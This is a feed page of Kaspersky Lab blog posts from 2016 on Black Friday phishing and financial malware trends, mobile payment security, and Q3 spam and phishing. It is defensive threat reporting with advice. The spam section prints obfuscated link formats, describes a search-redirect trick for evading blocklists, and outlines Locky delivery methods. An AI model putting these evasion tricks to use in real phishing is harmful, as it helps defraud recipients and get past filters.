Malware Alerts

Subscribe to Malware Alerts feed Malware Alerts
Online headquarters of Kaspersky Lab security experts.
Updated: 44 min 3 sec ago

Kaspersky Lab Black Friday Threat Overview 2016

Mon, 11/14/2016 - 03:57

 Download the PDF

Introduction

The Internet has changed forever how people shop. By 2018, around one in five of the world’s population will shop online; with ever more people doing so on a mobile device rather than a computer. In fact, it is estimated that by the end of 2017, 60% of e-commerce will come from smartphones. That’s millions of people enthusiastically browsing and buying while at home, at work, in restaurants, airports, and railway stations, walking down the street, standing in stores, and on holiday, often outside the protective reach of a secure, private wireless network.

Regardless of the device used, every interaction and transaction will generate a cloud of data that brands will want to capture in order to deliver ever more targeted and personalized offers. Unfortunately, others are waiting to seize consumers’ information too – through insecure public Wi-Fi networks, phishing emails and infected websites, among others. They are the cybercriminals, and they don’t have a consumer’s or even a brand’s best interests at heart.

The risks facing retailers and online shoppers peak during the busiest shopping days of the year: the late November Thanksgiving weekend that runs from Black Friday through to Cyber Monday, and all through December to Christmas and the New Year.

As the number and speed of transactions increase, so do the cyberthreats. In this overview, Kaspersky Lab reveals the reality in terms of the top cyber-attacks targeting consumers and retailers during this remarkable buying period.

To put this data in context, it is worth looking back over the last few years to see how the landscape has evolved, focusing in particular on Black Friday and Cyber Monday.

In 2013, the concepts of Black Friday and Cyber Monday were already well established in North America and starting to gain momentum elsewhere. In the US alone, Cyber Monday saw online sales grow by 21% on 2012, raking in sales of $2.27 billion. Black Friday achieved $1.93 billion worth of transactions, but won out on average sales value. 17% of total sales were undertaken on mobile – a 55% increase on 2012. In the UK, online sales rose by a slightly more modest 16% in November, with over $600 million believed to have been spent online on Cyber Monday alone.

This was also the year when US retailer Target discovered that the credit card details of around 40 million customers were breached between 27 November and 15 December, apparently through hacked in-store point-of-sale systems.

In 2014, the year of the now infamous Sony Entertainment hack, the records set in 2013 were all broken. Thanksgiving Day 2014 in the US marked the moment when more mobile devices (52%) than computers were used (48%) for browsing online; and Black Friday online sales were up 21% compared to the same day in 2013 – with around one in three (30%) orders placed using a mobile device. Adobe estimates overall online sales in the US of $2.4 billion on Black Friday, $1.3 billion on Thanksgiving Day and $2.7 billion on Cyber-Monday. In the UK, online sales peaked during the week of Black Friday sales surged by 44%, compared to the previous week, and up a staggering 135% on the same week in 2013. Mobile sales rose by 83%.

And the records were all broken again in 2015. In the US, Cyber Monday 2015 was the largest online sales day, ever. Online consumers spent a record $3.07 billion – and $8.03 billion across the four-day Thanksgiving weekend. IBM analysis shows that, overall, online sales were up by a quarter (26%) on 2014, with 40% of sales now coming from mobile devices.

The big consumer hacks of the season involved malware targeting point-of-sales systems in hotels, including Hyatt, Starwood and Hilton worldwide.

2016 looks set to break records all over again, and criminals will probably try even harder to take advantage of all the noise and activity to steal credentials to financial accounts or even to grab the money directly. This overview will cover the types of cyberthreats that buyers, sellers and providers of payment systems may face over the coming weeks.

Methodology and Key Findings

The overview is based on information gathered from Kaspersky Lab malware and phishing detection systems (number of attacks or number of attacked users), and also from the analysis of events and conversations happening on the hacker underground – multiple internet forums where users allegedly involved in financial fraud operations tend to gather. The overview covers Q4 in 2013, 2014, 2015 and partly (in some cases) 2016. Even though, officially, the “Black Friday” sales period ends with Cyber Monday, right after the Thanksgiving holidays, just a few days later another “high” sales period begins: the so-called pre-Christmas period, which is also one of the most profitable times of the year for retailers. We count October as a high sales period as well, because so-called “Black Friday” sales campaigns often start prior to the actual sales days (Halloween sales are a good example), and – what is more important – cybercriminals tend to start preparations in advance of day X.

The overview also contains a list of actions that could be implemented by regular users, business owners and owners of payment infrastructure in order to prevent fraud during the high retail season.

Key Findings:
  • The share of financial phishing during the high sales season is 9 percentage points higher than during other times of the year.
  • The share of phishing attacks against online shops and payment systems during the period is usually higher than phishing against banks.
  • Criminals are trying to connect their malicious campaigns, such as spreading financial malware and phishing pages, to particular dates: Black Friday, Cyber Monday, and the pre- and post-Christmas days.
  • Kaspersky Lab’s virus collection now counts 36 families of POS malware, 6 of which were added in 2016. The number of Banking malware families, in contrast, is only 30.
  • Underground vendors of skimmers and dummy plastic cards are already experiencing an increase in sales. In December 2015 the sales of skimmers rose more than tenfold: from the regular 25-30 devices to 500.
  • Kaspersky Lab researchers expect blackmailing DDoS-attacks against online retailers during the holidays.

More about these findings can be found in the overview.

Phishing

Among cybercriminals, phishing is one of the most popular ways to steal payment card details and credentials to online banking accounts. A phishing scheme is relatively easy to set up (the fraudster doesn’t even need to know how to write malware; only basic web development and design skills are required), yet it is effective because it is mostly based on social engineering techniques. During the holiday period, users are eager to find the best goods at the best price and they are expecting to see offers of this kind while surfing the web. Cybercriminals know about that and try to exploit this feature as much as possible.

Share of financial phishing in overall volume of attacks

As statistics from the previous years show, financial phishing usually accounts for no less than a quarter of all phishing attacks registered in a year. For example, in 2013, it was 31.45% of all registered phishing attacks, in 2014 – 28.74%, in 2015 – 34.33%. The current year is not yet over, but judging by the quarterly statistics the trend is the same.

Share of financial phishing in overall number of phishing attacks 2013 – 2016

And at the same time things are significantly different when it comes to what we call the holiday sales period. As expected, the share of financial phishing at this time is noticeably higher than the typical yearly result.

Share of financial phishing in different periods in comparison to the holiday period

Although in 2013 the number of financial phishing attacks during the high sales period was only 0.5 percentage points higher than the total result for the same year, in 2014 and 2015 we detected a clear difference of around 9 p.p. in favour of attacks during the holidays. Of course these data are not enough to talk about a strong tendency; nevertheless, the chances are high that this year this difference will emerge again.

Types of financial phishing

At Kaspersky Lab we distinguish between three major types of financial phishing: Banking, E-payment and E-shopping. They are all types of phishing pages that imitate the corresponding legitimate services dealing with financial transactions. Based on what we have observed in Q4 in 2014 and 2015, during the “Holiday” period, the separation between different types of financial phishing is different to the result for the full year.

For example, in 2013, shares of phishing attacks during the year and during the last “Holiday” quarter weren’t very different – less than 1 percentage point. However inside the category differences were much more visible.

That year the share of e-shop phishing in Q4 increased more than 1 percentage point to 7.8%. And the share of phishing against users of popular payment systems more than doubled compared to the rest of the year – 5.46% against 2.74%. At the same time, the share of phishing against users of online banking was lower than during the year: 18.76% against 22.2%.

The situation was repeated the next year, but with more visible amplitude. Shopping phishing during the holiday season was 5.32 p.p. higher than the full year result. And the payment systems’ phishing was 2.78 p.p. higher.

2013 Full year Q4 Financial phishing total 31.45% 32.02% E-shop 6.51% 7.80% E-banks 22.20% 18.76% E-payments 2.74% 5.46% 2014 Full year Q4 Financial phishing total 28.73% 38.49% E-shop 7.32% 12.63% E-banks 16.27% 17.94% E-payments 5.14% 7.92% 2015 Full year Q4 Financial phishing total 34.33% 43.38% E-shop 9.08% 12.29% E-banks 17.45% 18.90% E-payments 7.08% 12.19%

The change in shares of different types of financial phishing in 2013-2015

These differences are accompanied by attacks against particular targets. In 2014, Kaspersky Lab researchers conducted a small investigation into the dynamics of attacks during Black Friday and discovered that the number of attempts to load phishing pages detected and blocked by users of Kaspersky Lab products was actually growing.

Here are the timeline graphs for several targets that are traditionally most often used by phishing scammers.

Dynamics of detection of attempts to load phishing page where the American Express brand is mentioned demonstrates very similar behaviour in 2014 and 2015.

Dynamics of phishing attacks using the American Express brand in the week of Black Friday 2014 2015

Example of timeline of attacks against a particular target

And when it comes to other brands connected to online money and shopping the situation is repeated. Though the growth of attacks in 2015 happened after Black Friday and peaked on Cyber Monday.

Dynamics of phishing attacks using the Visa brand on Black Friday 2014 2015

Example of timeline of attacks against a particular target

Last but not least phishing attacks that utilize online shopping brands also obviously have a connection to specific days, such as Black Friday.

Dynamics of phishing attacks using the Wal Mart brand on Black Friday 2014 2015

Example of timeline of attacks against a particular target

Example of timeline of attacks against a particular target

Spikes in the number of detections are also typical for Christmas and the New Year period – basically they’re the second highest period in the whole quarter. Further in this overview we will show that attack peaks are typical features not only for phishing, but for financial malware attacks as well.

Examples of “Holiday” Phishing

In most cases cybercriminals don’t bother themselves with inventing anything special. Instead they just copy pages of legitimate shops, internet banking and payment systems.

As can be seen on the picture below the phishing copies of the Amazon shop quite precisely resemble the original website.

Example of a fake Amazon e-shop

Which is also true for sites of payment systems and banks. Below are pictures of phishing sites imitating Visa and American Express data submission forms. Along with some others, these two brands are traditionally among the top of those faked by phishers.

Example of a fake Visa payment form

Example of a fake American Express payment form

Sometimes criminals create whole fake web-shops simply to collect victims’ credit card data.

Example of 100% fake internet shop

They attract victims with extremely low prices for goods from famous brands. And then – when the victim has chosen the item they like and proceeds to the payment page, they simply steal their financial credentials.

Example of 100% fake internet shop, part 2, the payment page

Another way in which criminals exploit the hot sales period is by creating allegedly legitimate websites that are selling gift cards and coupons that – if they’re real – can be monetized in legitimate internet shops. However, criminals sell phony coupons, not real. The only purpose of these websites is to collect card credentials. An example of such a website is displayed in the picture below.

Example of a fake shop selling phony coupons

And of course criminals exploit the brand of Black Friday itself and they start their preparations way in advance. While preparing this overview Kaspersky Lab researchers came across a number of fake websites, which have the word Black Friday in the name and the content of which offers outstanding discounts on expensive goods.

Example of a fake Black Friday themed shop

In all, Kaspersky Lab security specialists expect that in 2016 the trends which emerged in previous years (higher than average percent of financial phishing, topical Black Friday scams, etc.) will continue their development as phishing remains one of the main source of credit card data for criminals and is still one of the easiest ways to set up a fraud scheme.

Financial malware

For years, banking trojans were one of the most dangerous cyberthreats out there. Unlike usual spyware which hunts for any type of credentials and, in most cases, is not very sophisticated, banking trojans are aimed specifically at users of internet banking and remote banking systems. Criminals tend to invest a lot of resources in the development of such malware and also develop different sophisticated techniques to avoid detection by AV products, and spread the malware as effective as possible. The most famous examples of banking malware are: ZeuS, SpyEye, Carberp, Citadel, Emotet, Lurk and others.

In previous years Kaspersky Lab experts have prepared two reports covering the global financial malware landscape, in 2013 and in 2014. And since then multiple things have changed: first of all the number of users attacked with banking malware has started to decrease. Most likely this is due to the fact that criminals have largely switched their attention from clients of banks to the banks themselves, because a sophisticated attack against a bank can bring much more profit than an attack against a regular user. Another reason is the rise of encryption ransomware which has proven itself a relatively effective way of getting money illegally. What hasn’t changed a lot is the attention of criminals to the high sales season.

the change in the number of attacks and attacked users from November to December 2015

According to Kaspersky Lab telemetry, during the holiday season of 2015, 261,000 users were attacked with banking malware That’s significantly less than in the same period a year ago, when 307,600 users were attacked. However, 2015 has shown the fairly obvious interest that criminals are showing in Black Friday, Cyber Monday and Christmas. In October the number was 61,674 users, in November – 81,038, and in December – 154,324 attacked users. A year before, in 2014, 101,300 users were hit in October, 164,000– in November and 102,900 in December.

The pattern is obvious.

The dynamics of attacks with help of financial malware from November 20 to December 3 2015 (Black Friday through Cyber Monday)

As can be seen on the graph above, the number of attacked users started to grow from November 22nd and peaked on November 26th, the day before the Black Friday 2015. The next visible peak happened on November 30th, which was the day of Cyber Monday that year. These two peaks were noticeably the biggest since the beginning of the period.

The dynamics of attacks with financial malware in Christmas period 2015

The next big rise in the number of attacks and attacked users happened on 24th of December, right before Christmas, followed by a huge two-day spike detected on 28th and 29th, not long before New Year’s Eve.

In 2014, the spikes of attacks in the holiday season weren’t that obvious, but still it was clear enough that the Black Friday period is of interest: a visible rise in attacks started on November 24th and peaked on November 27th, which was again the day before Black Friday. After that another spike was registered on 1st December, which was the day of Cyber Monday.

The dynamics of attacks with financial malware from November 20 to December 3 2015 (Black Friday through Cyber Monday)

Christmas 2014 also has shown correlation between holiday dates and attacks: on 24th and on 28th of December.

The dynamics of attacks with financial malware in the Christmas period 2014

Almost the same spikes appear when it comes to Mobile malware. Most of the detections on the graphs below were generated by a few families of malware: Faketoken, Svpeng, Marcher and Acecard. These four are the main threats when it comes to mobile banking on Android, and the criminals behind them obviously used the holidays to actively propagate these malicious programs. It was especially visible in 2014:

The dynamics of attacks with mobile financial malware on Black Friday through Cyber Monday 2014 period

2015 was significantly calmer in terms of the number of detections, but certain spikes were still in place.

The dynamics of attacks with mobile financial malware on Black Friday through Cyber Monday in 2015

POS malware

Another dangerous type of malware which we have already seen and are expecting to see during this season is POS-malware – the type of financial malware which infects the OS of point of sales terminals and then steals the credentials of the credit cards processed by these devices. So far, due to the specific nature of the devices that this type of malware tends to attack, we don’t yet have relevant statistics on the number of detections during the holiday period.

However we can estimate the threat by counting the number of families which our experts added in recent years. In 2013 only 4 families were added to our collection, but the 2013 Target breach inspired many criminals to attempt to reproduce the “success” of those who hacked the famous retailer, and the next year 12 more families of POS-malware were added. 2015 was the hottest year in terms of POS malware with 14 new families. 2016 is fairly calm so far: 6 new families were added to our collection since the beginning of the year. In total there are at least 36 families of malware capable of stealing data from POS terminals out there in the wild. The number is even bigger than the amount of banking malware families, 30 species of which are now in the Kaspersky Lab collection.

Expect new attacks

The motivation behind attacks that are tied to concrete dates are clear: cybercriminals suggest that the chances that users will be working with their financial accounts online more than usual are higher than on any other day. Therefore they tend to increase their hacking efforts to raise their own chances of stealing money. Judging by the dynamics of attacks of “holiday” dates from 2014 and 2015, Kaspersky Lab expects that in 2016, the situation may be repeated.

News from the Underground

While online shoppers are drawing up their wish-lists for the upcoming sales, retailers are preparing their stores for a massive rise in visitors, and financial infrastructure owners – banks and payment systems – are getting ready for a huge increase in the number and value of transactions, criminals are also preparing for the season. For this report Kaspersky Lab experts have conducted some research into events and discussions taking place on several secret, invitation-only underground forums, where users allegedly involved in different types of financial fraud tend to gather and discuss things.

More about Cyber Monday

Based on the results of the research, we can say that underground cybercriminals, at least on East European fora, are more excited about Cyber Monday than about Black Friday. This may be because Cyber Monday is more about online sales. There will be a lot of online advertising of special deals and it will be easier for them to hide phishing scams inside the stream of legitimate offers.

Also, from a logistics perspective, Cyber Monday is more convenient than Black Friday, which is more about offline sales. Criminals don’t have to deal with physical access to ATMs in order to set up, and later collect a skimmer. Instead they could use a phishing or malware attack in order to collect credentials and then monetize them in a number of ways.

That said, ATM skimming attacks will happen during Black Friday and will continue through other holidays: Christmas and New Year.

Example of an online advertisement for skimmers on one of the hacker forums

Based on information from the last year, during December 2015 more than 500 skimmers were sold on an East European black market, while “usual” sale rate is 25 – 30 devices per month. These devices come packed with everything necessary for successful data-stealing, like fake PIN-pads, hidden cameras etc. The vast majority (around 96.5%) of skimmers mimic the products of four popular vendors, and the rest 3.5% are skimmers that replicate custom models.

As a result of the 2015 holiday fraud campaign, criminals experienced certain problems with the cashing out of compromised cards. Based on conversations on the corresponding web resources, the cash-out projects (groups that undertake the cash-out for other criminals) were heavily overloaded so the cash-out orders took three months to complete. This was due to a large number of stolen credentials waiting to be cashed-out. According to Kaspersky Lab data, during December 2015 criminals were able to collect approximately 10 times as many credentials as during a non-holiday period. Basically this equates to the total number of card details they are usually able to steal during the rest of the year.

Example of an advertisement by an online shop selling stolen credit cards credentials

Information on several forums suggests that, in 2016, a month prior to the start of the Black Friday, vendors of skimmers were already experiencing an increase in sales, alongside vendors of blank cards that will later be used to clone stolen cards. Also, some vendors are offering new generations of POS skimmers which are attached to legitimate POS’s. Unlike earlier skimmers, the new generation is placed inside the card reader, which makes them much harder to spot with the naked eye.

Another interesting trend is that many criminals are avoiding starting their campaigns with malware, choosing instead phishing attacks because they consider them to be more efficient and safe. Besides that they are actively utilizing schemes that involve direct contact with the victim. In these attacks the fraudsters will call the victim, seemingly on behalf of a bank, and try to find out their credit card credentials with help of psychological tricks.

Kaspersky Lab experts also expect that more cases of cash-out through Apple Pay and Samsung Pay payment systems will happen during this holiday season. The recent increase in the list of countries where the systems are supported has brought a certain inspiration to criminal community. The ability to attach a card to an Apple ID and then use it to pay for real goods creates a relatively convenient way to cash-out for so called “stuffers” – criminals who specialize in cashing out through buying goods from internet and physical shops, as well as for virtual carders – criminals who monetize stolen credentials through virtual goods

Another rather interesting conclusion made by Kaspersky Lab researchers during their research of the cybercriminal underground, is that fraudsters expect a lot of profits from attacks during the holiday period, especially the pre- and post- Christmas to New Year period, not only due to the high number of buyers seeking to spend money, but also because (based on their experience, which they share on forums) in this period the anti-fraud departments of banks are weakened. Due to many employees going on vacation around these dates, banks suffer from a lack of personnel, and it is theoretically easier for criminals to hide fraudulent operations in the stream of legal ones.

Example of a fraudster’s website selling a DDoS-attack service

Other types of criminal groups – such as those specializing in DDoS attacks, will most likely try to attack online shops for the purpose of blackmailing. That is a well-known tactic which they use against small and medium retail organizations. By setting up a DDoS attack they would block access to the attacked store and, until the owner pays a ransom, they would keep it blocked. Not wanting to lose money because of the unavailability of the store the owners will often pay the criminals. This is likely to happen in the coming holiday season.

Conclusion and advice

The main purpose of this paper is to raise awareness of the threats that may ruin the upcoming holiday season for regular users and shoppers and owners of online stores and owners of financial infrastructure. Both Kaspersky Lab telemetry and the analysis of conversations happening on the underground suggest that cybercriminals will pay special attention to the upcoming high sales season. But this doesn’t mean that the holidays are already doomed.

If prepared, each legitimate party of this process: buyers, sellers and financial services providers will end up in profit. All they have to do is to follow some simple advice.

For regular users
  • Do not click on any links received from unknown people or on suspicious links sent by your friends on social networking sites or via e-mail. They can be malicious; created to download malware to your device or to lead to the phishing webpages aimed at harvesting user credentials.
  • Do not download, open or store unfamiliar files on your device, they can be malicious.
  • Do not use unreliable (public) Wi-Fi networks to make online payments, as hotspots can be easily hacked in order to listen to user traffic and to steal confidential information.
  • Do not enter your credit card details on unfamiliar or suspicious sites, to avoid passing them into cybercriminals’ hands.
  • Always double-check the webpage is genuine before entering any of your credentials or confidential information (at least take a look at the URL). Fake websites may look just like the real ones.
  • Only use sites which run with a secure connection (the address of the site should begin with HTTPS:// rather than HTTP://) to hinder theft of information transmitted.
  • Don’t tell anybody your one-time password or PIN-code, not even a bank representative. Cybercriminals can use this data to steal your money.
  • Install a security solution on your device with built-in technologies designed to prevent financial fraud. For example, Safe Money technology in Kaspersky Lab’s solutions creates secure environment for financial transactions on all levels.
  • And don’t forget about the same rules when using your mobile device for financial transactions, because cybercriminals and fraudsters target them too.
For retailers
  • Keep your e-commerce platform up-to-date. Every new update may contain critical patches to make the system less vulnerable to cybercriminals.
  • Pay attention to the personal information used for registration. Fraudsters tend to hide their identities but lack of creativity can serve as an indication of fraud. John Smith whose email address reads as 21192fjdj@xmail.com is likely to be a criminal. Check again and request more details from customers if needed. Adding captcha might be effective measure against this.
  • Restrict the number of attempted transactions. Criminals usually make multiple attempts to enter correct card numbers for one purchase. Use captcha and increased time intervals for attempts to re-enter card numbers.
  • Use two-factor authentication (Verified by Visa, MasterCard Secure Code and etc.). It will dramatically drop the number of cases of illegal card usage.
  • Be careful with suspicious orders. Several unrelated high-value items for more than $500 and extra payment for fast shipping to another country can be a sign of a criminal hurrying to resell as soon as possible. In such cases it is recommended to contact the customer on the phone and confirm the order.
  • Use tailored security solution to protect your point of sales terminals from malware attacks and make sure your POS terminals run the latest version of software.
  • Criminals may attempt to DDoS the website of your shop for blackmail purposes. Make sure that your IT security team is prepared for such attacks or, if you don’t have one, ask your hosting provider if it is possible to purchase a DDoS-protection service from them.
  • Educate your clients on possible cyberthreats they may encounter while shopping online and offline
For financial organizations
  • Introduce enterprise-wide fraud prevention strategy with special sections on ATM and internet banking security. Logical security, physical security of ATMs and fraud prevention measures should be addressed altogether as attacks are becoming more complex.
  • Conduct annual security audits and penetration tests. It is better to let professionals find vulnerabilities than wait until they will be found by cybercriminals.
  • Choose a multi-layered approach and techniques against fraud. Training employees to spot suspicious transactions should be combined with implementation of dedicated fraud prevention solutions. Financial security software based on innovative technologies helps to detect and fight fraudulent activity beyond human control.
  • Do not leave self-protection to customers. It is hardly possible to educate all customers – and it is always better to create a multi-layer security architecture that will provide all the services with the necessary level of security.
  • Remember that insiders are usually involved in half or more cybersecurity incidents. Use security approaches that allow for the detection of suspicious and potentially dangerous activity inside your infrastructure.
  • Make sure that your anti-fraud department is fully staffed during the holiday period.

Loop of Confidence

Thu, 11/10/2016 - 04:10

With the arrival of Apple Pay and Samsung Pay in Russia, many are wondering just how secure these payment systems are, and how popular they are likely to become. A number of experts have commented on this, basing their opinions on the common stereotypes of Android being insecure and the attacks which currently take place on wireless payments. In our opinion however, these technologies require a more detailed examination and a separate evaluation of the threats they face.

The conventional approach

Traditional threats associated with the use of bank cards in ATMs and physical stores have already been studied and described in sufficient detail:

  • the magnetic strip can be read using skimmers; modern versions of skimmers are advanced and very inconspicuous;
  • to read EMV chips, dedicated skimmers have been designed that are planted into payment terminals;
  • wireless payment systems (PayPass, PayWave) are potentially vulnerable to contactless, remote card reading attacks.

However, the growth in popularity of mobile devices has given rise to a new type of wireless mobile payment: a regular card payment can now be emulated using the smartphone’s built-in NFC antenna. The functionality is turned on at the request of the user, meaning there’s less risk than carrying around a card that’s constantly ready to make a payment. Bank clients, in turn, don’t have to take out their wallets when making a payment, and don’t even have to carry their bank cards around with them.

The technology for emulating cards on mobile devices (Host Card Emulation, HCE) may have been inexpensive and available to a broad range of device users starting from Android 4.4, but it had several drawbacks:

  • the payment terminal had to support wireless payments;
  • the eSE (embedded Secure Element) chip made the device more expensive, so initially it was incorporated into just a few top-of-the-range devices from major manufacturers;
  • if the manufacturer decided to cut costs on secure data storage, important information ended up being stored by the operating system which could be attacked by malware with root privileges on the device. However, this didn’t go beyond a few proof-of-concept attacks, because there are plenty of other easier ways of attacking mobile banking systems;
  • the developers attempted to mitigate the risks associated with storing important payment information on a mobile device, e.g. by using secure element in the cloud. This made smartphone-assisted payments unavailable in locations with unstable mobile services;
  • the risks associated with using software-based HCE storage made it highly advisable to introduce extra security measures into banking applications, making their development more complicated.

As a result, for many large banks, as well as users, paying with the help of card emulation using a smartphone is little more than a quirky feature used for promos or simply to show off in public.

New technologies

The problems described above have given rise to a number of studies, including some by large international companies, in search of more advanced technologies. The next step in the evolution of mobile payments was tokenized payment systems proposed by major market players – Apple, Samsung, and Google. Unlike card emulation on the device, these systems are based on exchanging tokens. A token is a unique transaction ID; the card details are never sent to the payment terminal. This addresses the problem of payment terminals being compromised by malware or skimmers. Unfortunately, this approach has the same problem: the technology has to be adopted and maintained by the manufacturer of the payment terminal.

Several years ago, a startup project called LoopPay attempted to address this problem. The developers proposed a kit consisting of a regular card reader for a 3.5 mm (1⁄8 in) audio jack and a phone case. Their know-how was a patented technology for emulating a bank card magnetic strip using a signal generated by their dedicated device. It has to be said that the creators took an early interest in secure data storage (on a dedicated device rather than on the phone) and protection from using the details of other people’s bank cards (personal data checked by comparing information about the user against information from the bank card’s Track 1 information). Later on, Samsung became interested in LoopPay and acquired the startup. After some time, the Magnetic Secure Transmission (MST) technology became available, complementing Samsung Pay tokenized payments. As a result, regular users can use their smartphones to make payments at payment terminals that support new wireless payment technologies and use MST at any type of terminal by just placing their device next to the magnetic strip reader.

We have been monitoring this project closely, and can now safely say that this technology is, on the whole, a big step forward in terms of convenience and security, because its developers have addressed lots of relevant risks:

  • secure element is used to reliably store data;
  • activation of payment mode on the phone requires the user to enter a PIN code or use a fingerprint;
  • on Samsung devices, a KNOX security solution and basic antivirus are pre-installed – these two block payment features when malware lands on the device;
  • KNOX Tamper Switch – an object of hate among forum-based “experts” – protects against more serious rootkit malware. KNOX Tamper Switch is a software and hardware appliance that irreversibly blocks the device’s business and payment features during any privilege escalation attacks;
  • payment functionality is only available from new devices for which security updates are available, and on which all vulnerabilities are quickly patched;
  • on some of the Samsung smartphones sold in Russia, Kaspersky Internet Security for Android is pre-installed. This provides extended protection from viruses and other mobile threats.

It should be noted that Samsung Pay, when making payments, uses a virtual card whose number is not available to the user, rather than the actual banking card tied to the user’s account. This method of payment works just fine when there is no Internet connection.

New old threats

There’s no doubt that the new technology has become an object of interest for security researchers. Potential attacks do exist for it and were presented at the latest BlackHat USA conference. These attacks may still only be potential threats, but we should still stay alert. Banks are just planning to introduce biometric authentication on ATMs in 2017, but cybercriminals are already collecting intelligence on which hardware manufacturers are involved, what sort of vulnerabilities exist in the hardware, etc. In other words, the technology is not even available to the wider public yet, but cybercriminals are already searching for weaknesses.

Cybercriminals are also studying Apple and Samsung’s technologies. To makes things worse for Russian users, these technologies only arrive in the Russian market a year after they are launched in Western countries.

Cybercriminals discussing the prospects of exploiting Apple Pay in Russia

At the same time, cybersecurity researchers tend to forget about conventional fraud, which mobile vendors are completely unprepared for as they enter a new sphere of business. Wireless payments have made card fraudsters’ lives much easier both in terms of online trade and shopping in regular stores. They no longer have to use a fake card with stolen card data recorded onto it, and thus run the risk of getting caught at the shop counter – now they can play it much safer by paying for merchandise with a stolen card attached to a top-of-the-range phone.

Alternatively, a fraudster can simply buy merchandise and gift cards in an Apple Store. In spite of all the security measures taken by Apple, the Apple Pay fraud rate in the US was 6% in 2015, or 60 times greater than the 0.1% bank card fraud.

Samsung Pay also sacrificed some of the useful anti-fraud features for usability after it purchased the startup; one being that accounts be rigidly attached to the cardholder’s name. For instance, I added my own bank card to my smartphone, and then added my colleague’s as well; in the original LoopPay solution, this was impossible.

To conclude, it’s now safe to say that the new tokenized solutions are indeed more secure and convenient compared to their predecessors. However, there’s still plenty of room for improvement when it comes to security, and that’s very important for the future prospects of the technology. After all, no one likes to lose money, be it banks or their clients.

Spam and phishing in Q3 2016

Wed, 11/09/2016 - 05:00

 Download the full report (PDF)

Spam: quarterly highlights Malicious spam

Throughout 2016 we have registered a huge amount of spam with malicious attachments; in the third quarter, this figure once again increased significantly. According to KSN data, in Q3 2016 the number of email antivirus detections totaled 73,066,751. Most malicious attachments contained Trojan downloaders that one way or another loaded ransomware onto the victim’s computer.

Number of email antivirus detections, Q1-Q3 2016

The amount of malicious spam reached its peak in September 2016. According to our estimates, the number of mass mailings containing the Necurs botnet alone amounted to 6.5% of all spam in September. To recap, this kind of malicious spam downloads the Locky malware to computers.

Most emails were neutral in nature. Users were prompted to open malicious attachments imitating bills supposedly sent by a variety of organizations, receipts, tickets, scans of documents, voice messages, notifications from stores, etc. Some messages contained no text at all. All this is consistent with recent trends in spam: fraudsters are now less likely to try and impress or intimidate users to make them click a malicious link or open an attachment. Instead, spammers try to make the email contents look normal, indistinguishable from other personal correspondence. Cybercriminals appear to believe that a significant proportion of users have mastered the basics of Internet security and can spot a fake threat, so malicious attachments are made to look like everyday mail.

Of particular note is the fact that spam coming from the Necurs botnet had a set pattern of technical email headers, while the schemes used by the Locky cryptolocker varied a lot. For example, the five examples above contain the following four patterns:

  • JavaScript loader in a ZIP archive loads and runs Locky.
  • Locky is loaded using a macro in the .docm file.
  • Archived HTML page with a JavaScript script downloads Locky.
  • Archived HTML page with a JavaScript script downloads the encrypted object Payload.exe, which runs Locky after decryption.
Methods and tricks: links in focus IP obfuscation

The third quarter saw spammers continue to experiment with obfuscated links. This well-known method of writing IP addresses in hexadecimal and octal systems was updated by scammers who began to add ‘noise’. As a result, an IP address in a link may end up looking like this:

HTTP://@[::ffff:d598:a862]:80/

Spammers also began to insert non-alphanumeric symbols and slashes in domain/IP addresses, for example:

http://0122.0142.0xBABD/

<a href=/@/0x40474B17

URL shortening services

Spammers also continued experimenting with URL shortening services, inserting text between slashes. For example:

Sometimes other links were used to add text noise:

The use of search queries

Some spammers have returned to the old method of hiding the addresses of their sites as search queries. This allows them to solve two problems: it bypasses black lists and makes the links unique for each email. In the third quarter, however, spammers went even further and used the Google option “I’m Feeling Lucky”. This option immediately redirects users to the website that’s displayed first in the list of search results, and it can be activated simply by adding “&btnI=ec” to the end of the link. Clicking on the link redirects users to the spammer’s site rather than to the page displayed in the Google search results. The advertising site itself is obviously optimized to appear first in the search results. There could be lots of similar queries within a single mass mailing.

The example above involves yet another trick. The search query is written in Cyrillic. The Cyrillic letters are first converted to a decimal format (e.g., “авто” becomes “Авто”), and then the whole query in decimal format, including special symbols, are converted to a hexadecimal URL format.

Imitations of popular sites

The third quarter saw phishers trying to cheat users by making a link look similar to that of a legitimate site. This trick is as old as the hills. In the past, real domain names were distorted very slightly; now, cybercriminals make use of either subdomains imitating real domain names or long domains with hyphens. So, in phishing attacks on PayPal users we came across the following domain names:

Phishing attacks targeting Apple users included the following names:

Spammers have also found help from new “descriptive” domain zones, where a fake link can seem more topical and trusted, for example:

Testers required

Q3 email traffic contained mass mailings asking users to participate in free testing of a product that they could then keep. The authors of the emails we analyzed were offering popular goods such as expensive brand-name home appliances (coffee machines, robot vacuum cleaners), cleaning products, cosmetics and even food. We also came across a lot of emails offering the chance to test the latest models of electronic devices including the new iPhone that was released at the end of the third quarter. The headers used in these mass mailings include: “Register to test & keep a new iPhone 7S! Wanted:! IPhone 7S Testers”. The release of the latest iPhone was met with the usual surge of spam activity dedicated exclusively to Apple products.

The largest percentage of spam in the third quarter – 61.25% – was registered in September #KLReport

Tweet

The people sending out these messages are in no way related to the companies whose products they use as bait. Moreover, they send out their mass mailings from fake email addresses or from empty, newly created domains.

The senders promise to deliver the goods for testing by post, and using this pretext they ask for the recipient’s postal and email addresses as well as other personal information. A small postal charge in is imposed on the user, but even if the goods are delivered, there is no guarantee they will be good quality. There are lots of posts on the Internet by users saying they never received any goods, even after paying the postage costs. This has an element of old-fashioned non-virtual fraud: the cybercriminals receive money transfers under the pretext of a postal charges and then disappear.

Gift certificates to suit all tastes

Spam traffic in Q3 included some interesting mailings using the common theme of fake gift certificates. Recipients were offered the chance to participate in an online survey in return for a certificate worth anything from ten to hundreds of euros or dollars. They were led to believe that the certificates were valid for large international retail chains, online hypermarkets, grocery stores, popular fast-food chains as well as gas stations.

In some cases, the senders of these fraudulent messages said they were carrying out a survey to improve the customer support services of the organizations that were allegedly behind these generous offers, as well as to improve the quality of their products. In other cases, the message was described as a stroke of luck and that the recipient’s email address was randomly selected for a generous gift as a mark of appreciation for using the brand’s goods or services. The messages were indeed randomly sent out to email addresses that had been collected by spammers, and did not necessarily belong to customers of the companies named in emails.

